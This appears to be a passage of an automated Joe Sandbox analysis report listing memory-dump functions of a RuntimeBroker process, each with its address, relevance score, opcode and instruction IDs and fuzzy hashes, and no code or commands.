                                            • Opcode Fuzzy Hash: 49f9a25965a9916dfff64e9d0bc3f190392675e5f15922ded998357502add174
                                            • Instruction Fuzzy Hash: 49118E3194E7C98FDB56AFB088641A43FB0EF1A201B0A41EBD489CB0B3D9682949C321
                                            Function 00007FFD9B8E0B71 Relevance: .1, Instructions: 54COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f6f1749f2e2e6584f8be3f1e1df3cc4f5722efec21fcce2bd7d1f193323b522f
                                            • Instruction ID: c05503e8376347aabeb7338e68088085e830b4b5aecca4bc989970af9f4c5502
                                            • Opcode Fuzzy Hash: f6f1749f2e2e6584f8be3f1e1df3cc4f5722efec21fcce2bd7d1f193323b522f
                                            • Instruction Fuzzy Hash: 4E018272A1A94D8FDF68DFA898A15FC7761FFA8310B14066AD01CC31A1DE35AA51C780
                                            Function 00007FFD9B8E65A0 Relevance: .1, Instructions: 54COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 04cb220ac761ff5cfd3bf8fa9ff169891277d4cea2994c7c62da16e59d25f715
                                            • Instruction ID: 92598f7dce1567d55060090d805a7b33d6ae3db9e8642c992c95336874ff8100
                                            • Opcode Fuzzy Hash: 04cb220ac761ff5cfd3bf8fa9ff169891277d4cea2994c7c62da16e59d25f715
                                            • Instruction Fuzzy Hash: F6210B70E0950DCBDB18EB85D8946ADB7F2FF98315F148235D009972A9DB38A946CB40
                                            Function 00007FFD9B8E2149 Relevance: .0, Instructions: 50COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a9b31c01a781c1e97bbb25bd15b3447648b558c0f9479d20d67fe8203e63adaf
                                            • Instruction ID: a055ffe0e4a57d5818f3b3e2d93903f6d9ec621a09db48435a95ccc758c69606
                                            • Opcode Fuzzy Hash: a9b31c01a781c1e97bbb25bd15b3447648b558c0f9479d20d67fe8203e63adaf
                                            • Instruction Fuzzy Hash: 2111E87090968D8FCF85EF68C858AE97FF0FF29305F0505AAE458D7261D7349554CB81
                                            Function 00007FFD9B8E2069 Relevance: .0, Instructions: 50COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 115c6b1c0d2bd7c96b7320c3c69cba25279d710b234647ddbe9112937f078f0b
                                            • Instruction ID: 5a5afdb9647d3e82e2f743d5a66475c79d1553913a72bd0e6f57e46ac0deb1d2
                                            • Opcode Fuzzy Hash: 115c6b1c0d2bd7c96b7320c3c69cba25279d710b234647ddbe9112937f078f0b
                                            • Instruction Fuzzy Hash: 85110370908A8D8FCB85EF68C858AA97BF0FF29300F0501AAE418D72A2DB74D554CB81
                                            Function 00007FFD9B8D7269 Relevance: .0, Instructions: 49COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9fd0f26842afba345b58784160ab24a9770dc9f1773fb4bbfb2ae251c7e1f77d
                                            • Instruction ID: 7453a47cd10448c676df9730b78d12bb6a30bbe0bc3959314435d199717a2656
                                            • Opcode Fuzzy Hash: 9fd0f26842afba345b58784160ab24a9770dc9f1773fb4bbfb2ae251c7e1f77d
                                            • Instruction Fuzzy Hash: 28113C3090868D8FCF45EF68C898AEA7BF0FF29304F0506AAE419C7161DB34A554CB81
                                            Function 00007FFD9B8E34AB Relevance: .0, Instructions: 48COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5ce00e07267019944256ecd382facef3e0e534c2919e0d8e890ebe3370c56a98
                                            • Instruction ID: 617b547eb19c4e201db8f92e011883d559f8945ddc0ed5bb43e6e1354b923ba5
                                            • Opcode Fuzzy Hash: 5ce00e07267019944256ecd382facef3e0e534c2919e0d8e890ebe3370c56a98
                                            • Instruction Fuzzy Hash: CD112170E0964D8EEBA9EB988455BACB7F1FF5C300F1581B6C00DA3261DA386E858F41
                                            Function 00007FFD9B8D9A09 Relevance: .0, Instructions: 46COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f53d1b480a2165e9b4e6dc2aec76644278f72fba1647e4b03dc57bee13811e6e
                                            • Instruction ID: f447a357de89c09c81e37fe6f0e46d8750bced1f947b9eb76cefcc9458344c33
                                            • Opcode Fuzzy Hash: f53d1b480a2165e9b4e6dc2aec76644278f72fba1647e4b03dc57bee13811e6e
                                            • Instruction Fuzzy Hash: B0014C31A0968D8FCB85DF68C858AAE7BB0FF69300F05069BD418D71A1D7349A54CB81
                                            Function 00007FFD9B8AE545 Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8aa000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7c93607edd358d02fb3d46c7c584f61009de59f0cb3b00781f9b463837ac245a
                                            • Instruction ID: f8b910d129c45c7337666be9d7e0f7497426d919218c5c3a79d1c4fcd512f5bf
                                            • Opcode Fuzzy Hash: 7c93607edd358d02fb3d46c7c584f61009de59f0cb3b00781f9b463837ac245a
                                            • Instruction Fuzzy Hash: E1111870A19A1D9FDB64DF84C4A0BECB7B2FB59311F2045A9D40E936A1CA382A81CB50
                                            Function 00007FFD9B8D8CC9 Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 60fe53a97334519e3f00ae7efb896822038bdfb10ae04dfa867ac86fdb9455f4
                                            • Instruction ID: c858eb81908ec9b8f4abe22a515c95207395c0d6ac9b5f7ebdba4595c31e6227
                                            • Opcode Fuzzy Hash: 60fe53a97334519e3f00ae7efb896822038bdfb10ae04dfa867ac86fdb9455f4
                                            • Instruction Fuzzy Hash: CD01403090968C8FCB45DF18C859AD97FF0FF69304F05019AD408C71A2D7359954CB41
                                            Function 00007FFD9B8B1768 Relevance: .0, Instructions: 44COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8aa000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e00006a3fd54c1519d46abe314bf4e13e112bfa9e45ca2d676c68707801c3d3b
                                            • Instruction ID: 3e2326c356a19fd3a542487c710f366e1e7e6430afcc9da35622c0fe424fb1f3
                                            • Opcode Fuzzy Hash: e00006a3fd54c1519d46abe314bf4e13e112bfa9e45ca2d676c68707801c3d3b
                                            • Instruction Fuzzy Hash: A701DA7091494D8FDF85EF58C849AEE77F0FB68305F00456AA81DD3260DB34A594CB81
                                            Function 00007FFD9B8E2160 Relevance: .0, Instructions: 44COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 61bc5143558074cd050a3b3a005e1cdce79b61e9d2b57490d61df3975219b01d
                                            • Instruction ID: 8331254f567e1dd6647f8feac8b24d3703f85531af50cdf052e5812ea328f0e4
                                            • Opcode Fuzzy Hash: 61bc5143558074cd050a3b3a005e1cdce79b61e9d2b57490d61df3975219b01d
                                            • Instruction Fuzzy Hash: 12019670914A4D9FDF84EF68C849AEA7BF0FB68305F00056AA819D3264DB30A694CB81
                                            Function 00007FFD9B8E2080 Relevance: .0, Instructions: 44COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3634ebe3f085756b3f1310779c30198032ca21148f03e4cde56b3fe61e425684
                                            • Instruction ID: 5b03aa9f40292499ba36d81d3a6dec46da76a63a3e19a3daf3068b46874279df
                                            • Opcode Fuzzy Hash: 3634ebe3f085756b3f1310779c30198032ca21148f03e4cde56b3fe61e425684
                                            • Instruction Fuzzy Hash: 2C01A870914A4D9FDF84EF68C849AEE7BF0FB68305F10456AA81DD3264DB70E694CB81
                                            Function 00007FFD9B8E5B39 Relevance: .0, Instructions: 42COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 592481068514c8e5fb70a2bd714b609f07dcd88f5f1625fbcd2b9b30934bf83e
                                            • Instruction ID: efd38fbc0540406f44e8329e37fb7a765b3917b629beae55ceb9c807040229b1
                                            • Opcode Fuzzy Hash: 592481068514c8e5fb70a2bd714b609f07dcd88f5f1625fbcd2b9b30934bf83e
                                            • Instruction Fuzzy Hash: 07011A3090868D8FDF85EF68C858AA97BF0FF29300F0505EBD419D71A2DB359A54CB41
                                            Function 00007FFD9B8DF499 Relevance: .0, Instructions: 42COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c381ec030eb794b4936054773b62dfecef9c53a6d45d46419b6769cd157cb808
                                            • Instruction ID: 087a99a0bb83ff5795d84b58081fc57b5a0de1c9353e4d5871c8a36b065e47a5
                                            • Opcode Fuzzy Hash: c381ec030eb794b4936054773b62dfecef9c53a6d45d46419b6769cd157cb808
                                            • Instruction Fuzzy Hash: D5015A70A0968D8FCF85DF68C858AAE7BF0FF69310F0545ABD418C72A2D7349A54CB81
                                            Function 00007FFD9B8D7349 Relevance: .0, Instructions: 41COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 19f91ca897bb7e6e8e660d77c8ea0287ee9f86fa5af85e1aea888fdc7b2ac8be
                                            • Instruction ID: a588c8d4a6b0210193f9658dee89ba864b4a5dcb05137f112279d97ce559b1d6
                                            • Opcode Fuzzy Hash: 19f91ca897bb7e6e8e660d77c8ea0287ee9f86fa5af85e1aea888fdc7b2ac8be
                                            • Instruction Fuzzy Hash: 8D012C3050968C8FCB45DF64C868AA97FB0FF69311F4501DBD409C71A2D7359994CB41
                                            Function 00007FFD9B8E6819 Relevance: .0, Instructions: 39COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7e98a564a47a63639d2cfc85c95f58e61aba740311c5a8774f38ec20191392d9
                                            • Instruction ID: e64a03f77ddbd94d6adc199812862772664ee5162a7c95aa53fd65be43aa8042
                                            • Opcode Fuzzy Hash: 7e98a564a47a63639d2cfc85c95f58e61aba740311c5a8774f38ec20191392d9
                                            • Instruction Fuzzy Hash: DC014F3050968C8FCB45DF64C864AE97FB0FF59300F0540DAD408C71A2C7759A54CB41
                                            Function 00007FFD9B8E6759 Relevance: .0, Instructions: 39COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cc89f320f4d2ee40c6876769540657d050a562ef867f724e1af7f06f3f32adb7
                                            • Instruction ID: 4a462d6f3f4fe7a755c3ad31efb36a39742d95fbb12b11471e49e48135375f57
                                            • Opcode Fuzzy Hash: cc89f320f4d2ee40c6876769540657d050a562ef867f724e1af7f06f3f32adb7
                                            • Instruction Fuzzy Hash: 7A014F7090968C8FCB99DF64C865A997FF0FF69300F0501EAD409D71A2D7359954CB41
                                            Function 00007FFD9B8E0BA9 Relevance: .0, Instructions: 38COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7cee801aa6e0431ff4e60b9d63b10e7d989b3af6483d767ad818a3be49564d05
                                            • Instruction ID: 66f86e5627ce8835f698e4ece20dfb38a380b9f63da8f3cb5b85e719ff4d2e94
                                            • Opcode Fuzzy Hash: 7cee801aa6e0431ff4e60b9d63b10e7d989b3af6483d767ad818a3be49564d05
                                            • Instruction Fuzzy Hash: 7B016D3191968D8FCB85EF68C868AEE7BF0FF69304F0505EAD419D71A2DB349A44CB41
                                            Function 00007FFD9B8DEFDA Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ae6b1f1b07363794c07bae77d339c7f81b78a2abecad1353cddf117793ce56e8
                                            • Instruction ID: 45f7246a3a8d9f02213c5fca592a8a82663a46cd4b9141bfb78128ab3ed15c50
                                            • Opcode Fuzzy Hash: ae6b1f1b07363794c07bae77d339c7f81b78a2abecad1353cddf117793ce56e8
                                            • Instruction Fuzzy Hash: 03F0123590554D9FDF94DF58C454AE97BF0FF58305F1141AAD41DC3160DB719A94CB80
                                            Function 00007FFD9B8D9A20 Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be913cabf01352c231b9a1a71890b5bb734223598c4d6d25d71f4c537776ce59
                                            • Instruction ID: b404c8d49700bb8d3d5d2451dc2edd8ceb211ef4471e4d1761ba74174920363c
                                            • Opcode Fuzzy Hash: be913cabf01352c231b9a1a71890b5bb734223598c4d6d25d71f4c537776ce59
                                            • Instruction Fuzzy Hash: 98F0E730A1490DCFCF84EF68C848AEE77F1FB68304F00056AA41DD32A4DB30AA50CB80
                                            Function 00007FFD9B8D7360 Relevance: .0, Instructions: 35COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8f25f9e3e9a81134df4cee6f3565521d117cf718e8639bf9c24771f4384c2a38
                                            • Instruction ID: b999eff22ce325bd6f2c75913dada1b8f9a150e848c2ac94ad66c113859e95cf
                                            • Opcode Fuzzy Hash: 8f25f9e3e9a81134df4cee6f3565521d117cf718e8639bf9c24771f4384c2a38
                                            • Instruction Fuzzy Hash: 74F0BD3091490DDFDF88EF58C458AEA7BF1FB68315F50419AA41DD3164DB3196A4CB81
                                            Function 00007FFD9B8DBFED Relevance: .0, Instructions: 34COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6eb2a167b23270599a65a158b40ac851390305643b723b799dbdcd2c39c5577f
                                            • Instruction ID: feb77f9132a828aa8c37daf2cf1e41c4d3caa868b92ea7efdda33095987482a9
                                            • Opcode Fuzzy Hash: 6eb2a167b23270599a65a158b40ac851390305643b723b799dbdcd2c39c5577f
                                            • Instruction Fuzzy Hash: 4A01DB30A0961ECBEBB4DF44C4987A8B2B5EB54315F2042AAD41C962A0CB746AC4CF41
                                            Function 00007FFD9B8DE1F8 Relevance: .0, Instructions: 34COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5884386c2080b46f594d027e7d2b2fa80adec1891f595c7fe93d8807ea7e3424
                                            • Instruction ID: c732129a8b110c811f373b90f634cd9c74161f67ba511afc79cc64c9c68c3835
                                            • Opcode Fuzzy Hash: 5884386c2080b46f594d027e7d2b2fa80adec1891f595c7fe93d8807ea7e3424
                                            • Instruction Fuzzy Hash: 61F01D3090494D9FCF84DF54C454AEA7BF0FF58305F1105AAE41DD3264CB31A690CB80
                                            Function 00007FFD9B8E3D20 Relevance: .0, Instructions: 34COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a710414b4ab4297ab75b5a543872b29ff39f511e461f72eb61e8ec8a422c9466
                                            • Instruction ID: 8c5fcc02ceb253c6657757fdd9ed094c695e60028c49e36afe895a973cb104d9
                                            • Opcode Fuzzy Hash: a710414b4ab4297ab75b5a543872b29ff39f511e461f72eb61e8ec8a422c9466
                                            • Instruction Fuzzy Hash: 08F0F97091490D9FDB98EF64C894AAA7BF0FB58305F1001AAE41DD3264DB31A690CB80
                                            Function 00007FFD9B8B0642 Relevance: .0, Instructions: 29COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8aa000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f0934ad560b8449542cb2b55196bc9e304ac5a04e4d692e7c50adf7ce5416855
                                            • Instruction ID: 87adb0b5afc020f51a3beff287104e0a10b7f7a7d8851028d5ed554c4fc9658c
                                            • Opcode Fuzzy Hash: f0934ad560b8449542cb2b55196bc9e304ac5a04e4d692e7c50adf7ce5416855
                                            • Instruction Fuzzy Hash: 89F01D70E2932D8EEB709BF5C8243BD76A0EF4D701F120039C40E921A1DE346A829E51
                                            Function 00007FFD9B8A0F8D Relevance: .0, Instructions: 29COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B89C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b89c000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f742b09357cc1974845a626f8edcf3236f5d49259fb34b317aee4fe3a784d895
                                            • Instruction ID: 74189f9f3f253edd2d5504b313f7aa2b5746349d654ecbc64616ec97aadf0d0a
                                            • Opcode Fuzzy Hash: f742b09357cc1974845a626f8edcf3236f5d49259fb34b317aee4fe3a784d895
                                            • Instruction Fuzzy Hash: 4DF0E230A0E28D9FCB52EF54C820ADA7BA0FF45300F0901EAE41CC71E2DB34AA24CB41
                                            Function 00007FFD9B89F63D Relevance: .0, Instructions: 26COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B89C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b89c000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cebc2d363f38d6da1e2fffd9da9c4db004691ebd8ae3cf148f71ac0ead988e8c
                                            • Instruction ID: 92f0a644308937178eb05134c75aa10658c360c512e14307a008955bb83b8240
                                            • Opcode Fuzzy Hash: cebc2d363f38d6da1e2fffd9da9c4db004691ebd8ae3cf148f71ac0ead988e8c
                                            • Instruction Fuzzy Hash: 77F0A031C1974D8FCB15AF70C9659EA3BB0FF00200F0600A6F419C21A2EA34A654CB01
                                            Function 00007FFD9B89F885 Relevance: .0, Instructions: 26COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B89C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b89c000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ab97e76b5f19fe8ed7130a211446d09b8bd0908f20bc6e80af83900a96b943d1
                                            • Instruction ID: 0c850446ae52fe61798b0f89dfe39b16839f70cbc759d5a8a74817f1c0f5c049
                                            • Opcode Fuzzy Hash: ab97e76b5f19fe8ed7130a211446d09b8bd0908f20bc6e80af83900a96b943d1
                                            • Instruction Fuzzy Hash: 66E0D83294F68D4FDB666B5448651F93F60FF45300F4A01B7E048890E3EA29A5598341
                                            Function 00007FFD9B89CC31 Relevance: .0, Instructions: 24COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B89C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b89c000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6cc3810af8107a595ea313c0aa78cb137d212c51e5e1ac9613cefb13f9a56bd4
                                            • Instruction ID: b3a6c73810ea9de24d274a4945a98ce09a167f720881deae3fe71f7e92d46ff8
                                            • Opcode Fuzzy Hash: 6cc3810af8107a595ea313c0aa78cb137d212c51e5e1ac9613cefb13f9a56bd4
                                            • Instruction Fuzzy Hash: 3FF05E70E1555E8AEBA4DF08C8646FE66B1EF84344F0101F6901C931A6DE302E828B41
                                            Function 00007FFD9B8E348A Relevance: .0, Instructions: 11COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8ddb301bd646cfc5faafcd321a490b57255de5bbc0eface6f4b13997d4872e92
                                            • Instruction ID: f4f1f9b389c63c4010e50abe081c8853e1d4ad15ac629c8e4d981d5e13abd97e
                                            • Opcode Fuzzy Hash: 8ddb301bd646cfc5faafcd321a490b57255de5bbc0eface6f4b13997d4872e92
                                            • Instruction Fuzzy Hash: FFC01251A0640D4AFA64DB144855B682291FF58300F020271944CC3151DA2469428700
                                            Function 00007FFD9B8DB489 Relevance: .0, Instructions: 11COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000030.00000002.2793763846.00007FFD9B8D6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D6000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_48_2_7ffd9b8d6000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5ed7ecb291c8b1f3f8a979adbabf607175e437be0cd19d27056505cf12c1810c
                                            • Instruction ID: a8e50ba35f54713b233b8eb8771de83b5df2b56e36b53377b81d541ecbf08716
                                            • Opcode Fuzzy Hash: 5ed7ecb291c8b1f3f8a979adbabf607175e437be0cd19d27056505cf12c1810c
                                            • Instruction Fuzzy Hash: 5ED09E7090861DCFDBB5DF04C4953A8B6F5EB58300F1001EAA00DD2290CB742BC0CF01

                                            Executed Functions

